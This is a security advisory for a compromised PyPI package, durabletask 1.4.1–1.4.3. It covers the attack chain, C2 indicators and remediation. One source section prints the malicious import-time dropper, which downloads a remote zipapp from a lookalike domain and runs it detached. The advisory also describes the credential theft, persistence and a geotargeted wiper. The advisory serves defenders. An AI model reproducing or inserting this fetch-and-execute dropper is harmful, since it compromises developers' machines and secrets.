MAL-2026-4174

**1.4.1**, **1.4.2**, and **1.4.3** of `durabletask` were compromised via a **PyPI maintainer account takeover**. All three malicious versions were published on 2026-05-19 within a 35-minute window (16:19–16:54 UTC). Pin to `<=1.4.0`.

**Attack chain**

- *Stage 1 — Import-time dropper:* on import, the package fetches a second-stage payload `rope.pyz` from `check.git-service.com` (`160.119.64.3`). The TLS certificate for this C2 was issued on 2026-05-16, indicating ~3 days of pre-attack staging. - *Stage 2 — Credential-theft framework:* - AWS / Azure / GCP IMDS interrogation and Secrets Manager dumps - Kubernetes lateral movement via in-cluster service-account tokens - HashiCorp Vault token extraction - Harvesting from 85 known filesystem credential paths - Brute-forcing of local password manager vaults - *Exfiltration:* stolen data is encrypted and shipped to the primary C2, with a **dead-drop fallback** that pushes encrypted blobs as GitHub commits (FIRESCALE-style egress). - *Persistence:* systemd unit `pgsql-monitor.service`. - *Destructive payload:* a **geotargeted wiper** activates on hosts identified as being located in **Israel** or **Iran**.

**Indicators of compromise**

- C2 (primary): `check.git-service.com` — `160.119.64.3` - C2 (secondary): `t.m-kosche.com` — `185.95.159.32` - Dropped payload: `rope.pyz` - Persistence unit: `pgsql-monitor.service`

**Recommended actions**

- Pin `durabletask` to `<=1.4.0`. - Block both C2 domains at network egress. - Treat any Linux system that imported 1.4.1 / 1.4.2 / 1.4.3 as **fully compromised** — rotate all reachable secrets and rebuild affected hosts.

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (daa176998359c04f9e002ff27fa947f12f08ddf49648ac7444ca894602317662) On every `import durabletask`, the package's top-level `__init__.py` (lines 8-11) calls `urllib.request.urlretrieve('https://check.git-service.com/rope.pyz', '/tmp/managed.pyz')` and then `subprocess.Popen(['python3', '/tmp/managed.pyz'], start_new_session=True)` on Linux. The fetched zipapp is executed with no hash or signature verification, in a detached session. The destination `check.git-service.com` is a generic-git-service lookalike domain unrelated to the legitimate publisher of durabletask (Microsoft / microsoft/durabletask-python on github.com). The trigger is module import — not `pip install` — so install-phase sandboxes (`pip download`, `pip wheel`, build isolation) never observe the network activity; the dropper fires when the package is loaded in CI, production, or a developer's interpreter. The pattern (plaintext additive trailing block in `__init__.py`, Linux platform gate, `.pyz` staged to `/tmp/` and handed to `python3`, lookalike `git-<project>.com`-style C2) matches a known import-time dropper campaign and is structurally indistinguishable from a stolen-publish-credential compromise of a legitimate package.

## Source: kam193 (9c23380bb017a417e3f26575c5b96e32fb0bf11dec8314d16f8b979052748049) Versions 1.4.1, 1.4.2, 1.4.3 were compromised.

During import of compromised versions, the malicious code is downloaded and executed. It exfiltrates all kinds of credentials and sensitive files, including data from secret and password managers, SSH keys, configuration files. Code tries to achieve a persistence via systemd unit.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-compr-durabletask

Reasons (based on the campaign):

- files-exfiltration

- exfiltration-env-variables

- exfiltration-ssh-keys

- exfiltration-cloud-tokens

- Downloads and executes a remote malicious script.

- exfiltration-credentials

- persistence

- compromised-package